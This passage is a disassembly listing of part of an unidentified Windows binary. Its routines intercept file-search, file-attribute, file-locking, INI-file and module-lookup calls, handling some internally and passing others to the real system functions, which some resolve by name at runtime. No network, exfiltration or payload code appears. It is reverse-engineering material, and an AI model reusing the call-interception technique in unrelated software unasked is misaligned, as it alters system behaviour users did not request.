; FUNCTION CHUNK AT 0041DACC SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4219F8
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_41365E
test eax, eax
jnz short loc_41DA4C
and [ebp+var_164], 0
push offset dword_4215AC
push offset aFindfirstfilew ; "FindFirstFileW"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_41DAAB
; ---------------------------------------------------------------------------
loc_41DA4C: ; CODE XREF: sub_41D997+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
loc_41DAAB: ; CODE XREF: sub_41D997+B3�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41DAB6
jmp short loc_41DACC
sub_41D997 endp
; =============== S U B R O U T I N E =======================================
sub_41DAB6 proc near ; CODE XREF: sub_41D997+118�p
; DATA XREF: _4:00421A00�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_41BACD
pop ecx
retn
sub_41DAB6 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41D997
loc_41DACC: ; CODE XREF: sub_41D997+11D�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 8
; END OF FUNCTION CHUNK FOR sub_41D997
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DAE0 proc near ; DATA XREF: _5:004242D0�o
var_168 = dword ptr -168h
var_164 = dword ptr -164h
var_160 = byte ptr -160h
var_134 = byte ptr -134h
var_30 = byte ptr -30h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
; FUNCTION CHUNK AT 0041DC21 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A08
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 154h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_168], eax
mov eax, [ebp+var_168]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
lea eax, [ebp+var_1C]
push eax
lea eax, [ebp+var_160]
push eax
push [ebp+var_20]
call sub_41365E
test eax, eax
jnz short loc_41DBA1
and [ebp+var_164], 0
push offset dword_4215AC
push offset aFindfirstfilee ; "FindFirstFileExW"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_164], eax
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_164]
mov [ebp+var_1C], eax
jmp short loc_41DC00
; ---------------------------------------------------------------------------
loc_41DBA1: ; CODE XREF: sub_41DAE0+84�j
lea ecx, [ebp+var_134]
lea eax, [ebp+var_160]
sub ecx, eax
lea esi, [ebp+var_160]
mov edi, [ebp+arg_8]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_8]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_134]
push eax
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_8]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_30]
push eax
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
loc_41DC00: ; CODE XREF: sub_41DAE0+BF�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41DC0B
jmp short loc_41DC21
sub_41DAE0 endp
; =============== S U B R O U T I N E =======================================
sub_41DC0B proc near ; CODE XREF: sub_41DAE0+124�p
; DATA XREF: _4:00421A10�o
mov eax, [ebp-20h]
mov [ebp-16Ch], eax
push dword ptr [ebp-16Ch]
call sub_41BACD
pop ecx
retn
sub_41DC0B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DAE0
loc_41DC21: ; CODE XREF: sub_41DAE0+129�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 18h
; END OF FUNCTION CHUNK FOR sub_41DAE0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC35 proc near ; DATA XREF: _5:004242D8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_413838
test eax, eax
jnz short loc_41DC55
push [ebp+arg_0]
call ds:dword_42464C ; FindClose
mov [ebp+var_4], eax
loc_41DC55: ; CODE XREF: sub_41DC35+12�j
mov eax, [ebp+var_4]
leave
retn 4
sub_41DC35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC5C proc near ; DATA XREF: _5:004242E0�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4136FE
test eax, eax
jnz short loc_41DC86
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424654 ; FindNextFileA
mov [ebp+var_4], eax
loc_41DC86: ; CODE XREF: sub_41DC5C+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_41DC5C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DC8D proc near ; DATA XREF: _5:004242E8�o
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_118 = byte ptr -118h
var_14 = byte ptr -14h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 148h
push esi
push edi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_144]
push eax
push [ebp+arg_0]
call sub_4136FE
test eax, eax
jnz short loc_41DCDE
and [ebp+var_148], 0
push offset dword_4215AC
push offset aFindnextfilew ; "FindNextFileW"
call sub_41D300
pop ecx
pop ecx
mov [ebp+var_148], eax
push [ebp+arg_4]
push [ebp+arg_0]
call [ebp+var_148]
mov [ebp+var_4], eax
jmp short loc_41DD3D
; ---------------------------------------------------------------------------
loc_41DCDE: ; CODE XREF: sub_41DC8D+20�j
lea ecx, [ebp+var_118]
lea eax, [ebp+var_144]
sub ecx, eax
lea esi, [ebp+var_144]
mov edi, [ebp+arg_4]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 104h
mov eax, [ebp+arg_4]
add eax, 2Ch
push eax
push 0FFFFFFFFh
lea eax, [ebp+var_118]
push eax
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
push 0Eh
mov eax, [ebp+arg_4]
add eax, 234h
push eax
push 0Eh
lea eax, [ebp+var_14]
push eax
push 0
push 0
call ds:dword_4246F0 ; MultiByteToWideChar
loc_41DD3D: ; CODE XREF: sub_41DC8D+4F�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn 8
sub_41DC8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD46 proc near ; DATA XREF: _5:00424358�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_414856
test eax, eax
jnz short loc_41DD70
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42467C ; GetFileInformationByHandle
mov [ebp+var_4], eax
loc_41DD70: ; CODE XREF: sub_41DD46+19�j
mov eax, [ebp+var_4]
leave
retn 8
sub_41DD46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DD77 proc near ; DATA XREF: _5:00424360�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_41494E
test eax, eax
jnz short loc_41DDA5
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246E8 ; LockFile
mov [ebp+var_4], eax
jmp short loc_41DDAC
; ---------------------------------------------------------------------------
loc_41DDA5: ; CODE XREF: sub_41DD77+12�j
mov [ebp+var_4], 1
loc_41DDAC: ; CODE XREF: sub_41DD77+2C�j
mov eax, [ebp+var_4]
leave
retn 14h
sub_41DD77 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDB3 proc near ; DATA XREF: _5:00424368�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push [ebp+arg_0]
call sub_41494E
test eax, eax
jnz short loc_41DDDE
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42471C ; UnlockFile
jmp short locret_41DDE1
; ---------------------------------------------------------------------------
loc_41DDDE: ; CODE XREF: sub_41DDB3+12�j
push 1
pop eax
locret_41DDE1: ; CODE XREF: sub_41DDB3+29�j
leave
retn 14h
sub_41DDB3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DDE5 proc near ; DATA XREF: _5:00424238�o
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
lea edx, [ebp+var_4]
mov ecx, [ebp+arg_0]
call sub_415B3D
test eax, eax
jnz short loc_41DE03
push [ebp+arg_0]
call ds:dword_424674 ; GetFileAttributesA
jmp short locret_41DE0F
; ---------------------------------------------------------------------------
loc_41DE03: ; CODE XREF: sub_41DDE5+11�j
movzx eax, [ebp+var_4]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
locret_41DE0F: ; CODE XREF: sub_41DDE5+1C�j
leave
retn 4
sub_41DDE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DE13 proc near ; DATA XREF: _5:00424240�o
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041DECC SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A18
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_2C], eax
mov eax, [ebp+var_2C]
mov [ebp+var_20], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_20]
rep stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
mov [ebp+var_24], eax
cmp [ebp+var_24], 103h
ja short loc_41DE94
lea edx, [ebp+var_28]
mov ecx, [ebp+var_20]
call sub_415B3D
test eax, eax
jnz short loc_41DEA2
loc_41DE94: ; CODE XREF: sub_41DE13+70�j
push [ebp+arg_0]
call ds:dword_424678 ; GetFileAttributesW
mov [ebp+var_1C], eax
jmp short loc_41DEB1
; ---------------------------------------------------------------------------
loc_41DEA2: ; CODE XREF: sub_41DE13+7F�j
movzx eax, [ebp+var_28]
neg eax
sbb eax, eax
and eax, 0Fh
inc eax
mov [ebp+var_1C], eax
loc_41DEB1: ; CODE XREF: sub_41DE13+8D�j
or [ebp+var_4], 0FFFFFFFFh
call sub_41DEBC
jmp short loc_41DECC
sub_41DE13 endp
; =============== S U B R O U T I N E =======================================
sub_41DEBC proc near ; CODE XREF: sub_41DE13+A2�p
; DATA XREF: _4:00421A20�o
mov eax, [ebp-20h]
mov [ebp-30h], eax
push dword ptr [ebp-30h]
call sub_41BACD
pop ecx
retn
sub_41DEBC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41DE13
loc_41DECC: ; CODE XREF: sub_41DE13+A7�j
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_41DE13
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DEE0 proc near ; DATA XREF: _5:00424260�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push [ebp+arg_0]
call sub_414670
test eax, eax
jnz short loc_41DF05
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424680 ; GetFileSize
mov [ebp+var_4], eax
jmp short loc_41DF11
; ---------------------------------------------------------------------------
loc_41DF05: ; CODE XREF: sub_41DEE0+12�j
cmp [ebp+arg_4], 0
jz short loc_41DF11
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
loc_41DF11: ; CODE XREF: sub_41DEE0+23�j
; sub_41DEE0+29�j
mov eax, [ebp+var_4]
leave
retn 8
sub_41DEE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF18 proc near ; CODE XREF: sub_402240-725�p
; sub_401D20+AF�p
; DATA XREF: ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
lea eax, [ebp+var_4]
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41A831
add esp, 10h
test eax, eax
jnz short loc_41DF4B
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_424694 ; GetModuleFileNameA
mov [ebp+var_4], eax
loc_41DF4B: ; CODE XREF: sub_41DF18+1F�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_41DF18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DF52 proc near ; DATA XREF: _5:00424338�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
xor edx, edx
mov ecx, [ebp+arg_14]
call sub_415867
test eax, eax
jz short loc_41DFD5
push 0
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_415B59
add esp, 1Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41DFD3
cmp [ebp+arg_8], 0
jz short loc_41DFD3
mov eax, [ebp+arg_10]
dec eax
push eax
push [ebp+arg_8]
push [ebp+arg_C]
call sub_410630
add esp, 0Ch
mov edi, [ebp+arg_8]
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
dec ecx
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_10]
jnb short loc_41DFC7
mov eax, [ebp+var_8]
mov [ebp+var_C], eax
jmp short loc_41DFCD
; ---------------------------------------------------------------------------
loc_41DFC7: ; CODE XREF: sub_41DF52+6B�j
mov eax, [ebp+arg_10]
mov [ebp+var_C], eax
loc_41DFCD: ; CODE XREF: sub_41DF52+73�j
mov eax, [ebp+var_C]
mov [ebp+var_4], eax
loc_41DFD3: ; CODE XREF: sub_41DF52+3A�j
; sub_41DF52+40�j
jmp short loc_41DFF0
; ---------------------------------------------------------------------------
loc_41DFD5: ; CODE XREF: sub_41DF52+15�j
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246A4 ; GetPrivateProfileStringA
mov [ebp+var_4], eax
loc_41DFF0: ; CODE XREF: sub_41DF52:loc_41DFD3�j
mov eax, [ebp+var_4]
pop edi
leave
retn 18h
sub_41DF52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DFF8 proc near ; DATA XREF: _5:00424340�o
var_58 = dword ptr -58h
var_54 = byte ptr -54h
var_53 = byte ptr -53h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 58h
push edi
and [ebp+var_4], 0
push 0
xor edx, edx
mov ecx, [ebp+arg_C]
call sub_415867
test eax, eax
jz short loc_41E062
and [ebp+var_54], 0
push 13h
pop ecx
xor eax, eax
lea edi, [ebp+var_53]
rep stosd
stosw
stosb
push 0
push [ebp+arg_C]
push 50h
lea eax, [ebp+var_54]
push eax
push offset dword_424898
push [ebp+arg_4]
push [ebp+arg_0]
call sub_415B59
add esp, 1Ch
mov [ebp+var_58], eax
cmp [ebp+var_58], 0
jnz short loc_41E053
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
jmp short loc_41E060
; ---------------------------------------------------------------------------
loc_41E053: ; CODE XREF: sub_41DFF8+51�j
lea eax, [ebp+var_54]
push eax
call sub_410A05
pop ecx
mov [ebp+var_4], eax
loc_41E060: ; CODE XREF: sub_41DFF8+59�j
jmp short loc_41E077
; ---------------------------------------------------------------------------
loc_41E062: ; CODE XREF: sub_41DFF8+19�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_42469C ; GetPrivateProfileIntA
mov [ebp+var_4], eax
loc_41E077: ; CODE XREF: sub_41DFF8:loc_41E060�j
mov eax, [ebp+var_4]
pop edi
leave
retn 10h
sub_41DFF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E07F proc near ; DATA XREF: _5:00424348�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+arg_8]
call sub_415867
test eax, eax
jz short loc_41E0B1
push 0
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push 0
push 0
push 0
call sub_415B59
add esp, 1Ch
mov [ebp+var_4], eax
jmp short loc_41E0C3
; ---------------------------------------------------------------------------
loc_41E0B1: ; CODE XREF: sub_41E07F+12�j
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_4246A0 ; GetPrivateProfileSectionNamesA
mov [ebp+var_4], eax
loc_41E0C3: ; CODE XREF: sub_41E07F+30�j
mov eax, [ebp+var_4]
leave
retn 0Ch
sub_41E07F endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push 0
xor edx, edx
mov ecx, [ebp+14h]
call sub_415867
test eax, eax
jz short loc_41E0FD
push 1
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push 0
push 0
push dword ptr [ebp+8]
call sub_415B59
add esp, 1Ch
mov [ebp-4], eax
jmp short loc_41E112
; ---------------------------------------------------------------------------
loc_41E0FD: ; CODE XREF: _3:0041E0DC�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call ds:dword_421028 ; GetPrivateProfileSectionA
mov [ebp-4], eax
loc_41E112: ; CODE XREF: _3:0041E0FB�j
mov eax, [ebp-4]
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E119 proc near ; CODE XREF: sub_41E15D+8�p
; sub_41E170+9�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
call sub_419424
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41E158
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
call sub_419995
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41E158
call ds:dword_424690 ; RtlGetLastWin32Error
test eax, eax
jnz short loc_41E154
push 7Eh
call ds:dword_42470C ; RtlRestoreLastWin32Error
loc_41E154: ; CODE XREF: sub_41E119+31�j
xor eax, eax
jmp short locret_41E15B
; ---------------------------------------------------------------------------
loc_41E158: ; CODE XREF: sub_41E119+13�j
; sub_41E119+27�j
mov eax, [ebp+var_4]
locret_41E15B: ; CODE XREF: sub_41E119+3D�j
leave
retn
sub_41E119 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E15D proc near ; CODE XREF: sub_4014A0+14�p
; sub_4184A0+EB�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_41E119
pop ecx
pop ecx
pop ebp
retn 4
sub_41E15D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E170 proc near ; CODE XREF: sub_41CBF6+B9�p
; sub_41CE67+B9�p ...
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41E119
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_41E170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E184 proc near ; CODE XREF: sub_41E22D+8�p
; sub_41E240+9�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A28
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
and [ebp+var_1C], 0
and [ebp+var_4], 0
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_20], eax
mov eax, [ebp+var_20]
mov [ebp+var_1C], eax
push 41h
pop ecx
xor eax, eax
mov edi, [ebp+var_1C]
rep stosd
push 0
push 0
push 104h
push [ebp+var_1C]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
push [ebp+arg_4]
push [ebp+var_1C]
call sub_41E119
pop ecx
pop ecx
push 0FFFFFFFFh
mov [ebp+var_28], eax
lea eax, [ebp+var_10]
push eax
call sub_41042A
pop ecx
pop ecx
mov eax, [ebp+var_28]
jmp short loc_41E21E
; ---------------------------------------------------------------------------
loc_41E20C: ; DATA XREF: _4:00421A30�o
mov eax, [ebp+var_1C]
mov [ebp+var_24], eax
push [ebp+var_24]
call sub_41BACD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_41E21E: ; CODE XREF: sub_41E184+86�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_41E184 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E22D proc near ; DATA XREF: _5:004242A0�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push [ebp+arg_0]
call sub_41E184
pop ecx
pop ecx
pop ebp
retn 4
sub_41E22D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E240 proc near ; DATA XREF: _5:004242B0�o
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41E184
pop ecx
pop ecx
pop ebp
retn 0Ch
sub_41E240 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E254 proc near ; CODE XREF: sub_402240-72C�p
; sub_401D20+A8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_41E268
push 0
call ds:dword_424698 ; GetModuleHandleA
jmp short locret_41E28A
; ---------------------------------------------------------------------------
loc_41E268: ; CODE XREF: sub_41E254+8�j
push [ebp+arg_0]
call ds:dword_424698 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41E287
xor dl, dl
mov ecx, [ebp+arg_0]
call sub_41925C
mov [ebp+var_4], eax
loc_41E287: ; CODE XREF: sub_41E254+24�j
mov eax, [ebp+var_4]
locret_41E28A: ; CODE XREF: sub_41E254+12�j
leave
retn 4
sub_41E254 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E28E proc near ; DATA XREF: _5:00424320�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041E32A SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A38
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 10h
push ebx
push esi
push edi
cmp [ebp+arg_0], 0
jnz short loc_41E2C3
push 0
call ds:dword_424698 ; GetModuleHandleA
jmp short loc_41E32D
; ---------------------------------------------------------------------------
loc_41E2C3: ; CODE XREF: sub_41E28E+29�j
and [ebp+var_1C], 0
and [ebp+var_20], 0
and [ebp+var_4], 0
push 104h
call sub_41BA4A
pop ecx
mov [ebp+var_24], eax
mov eax, [ebp+var_24]
mov [ebp+var_20], eax
xor eax, eax
mov edi, [ebp+var_20]
stosd
push 0
push 0
push 104h
push [ebp+var_20]
push 0FFFFFFFFh
push [ebp+arg_0]
push 0
push 0
call ds:dword_424738 ; WideCharToMultiByte
push [ebp+var_20]
call sub_41E254
mov [ebp+var_1C], eax
or [ebp+var_4], 0FFFFFFFFh
call sub_41E31A
jmp short loc_41E32A
sub_41E28E endp
; =============== S U B R O U T I N E =======================================
sub_41E31A proc near ; CODE XREF: sub_41E28E+85�p
; DATA XREF: _4:00421A40�o
mov eax, [ebp-20h]
mov [ebp-28h], eax
push dword ptr [ebp-28h]
call sub_41BACD
pop ecx
retn
sub_41E31A endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E28E
loc_41E32A: ; CODE XREF: sub_41E28E+8A�j
mov eax, [ebp+var_1C]
loc_41E32D: ; CODE XREF: sub_41E28E+33�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
; END OF FUNCTION CHUNK FOR sub_41E28E
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E33E proc near ; CODE XREF: sub_4014A0+29�p
; DATA XREF: _0:off_401024�o ...
var_30 = dword ptr -30h
var_28 = byte ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041E446 SIZE 00000014 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_421A48
push offset sub_4104E0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_1C], 0
mov eax, [ebp+arg_4]
shr eax, 10h
and eax, 0FFFFh
movzx eax, ax
test eax, eax
jz short loc_41E396
push offset aDllgetclassobj ; "DllGetClassObject"
push [ebp+arg_4]
call ds:dword_424740 ; lstrcmpi
test eax, eax
jnz short loc_41E396
mov ecx, [ebp+arg_0]
call sub_419393
loc_41E396: ; CODE XREF: sub_41E33E+3C�j
